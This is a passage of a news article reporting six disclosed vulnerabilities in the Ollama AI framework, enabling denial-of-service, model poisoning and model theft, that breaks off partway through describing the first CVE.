Critical Flaws in Ollama AI Framework Could Enable DoS, Model Theft, and Poisoning
Nov 04, 2024
Vulnerability / Cyber Threat
Cybersecurity researchers have disclosed six security flaws in the Ollama artificial intelligence (AI) framework that could be exploited by a malicious actor to perform various actions, including denial-of-service, model poisoning, and model theft. "Collectively, the vulnerabilities could allow an attacker to carry out a wide-range of malicious actions with a single HTTP request, including denial-of-service (DoS) attacks, model poisoning, model theft, and more," Oligo Security researcher Avi Lumelsky said in a report published last week. Ollama is an open-source application that allows users to deploy and operate large language models (LLMs) locally on Windows, Linux, and macOS devices. Its project repository on GitHub has been forked 7,600 times to date. A brief description of the six vulnerabilities is below - CVE-2024-39719 (CVSS score: 7.5) - A vulnerability that an attacker can exploit using /api/create an endpoint to determine the existence of a file in the se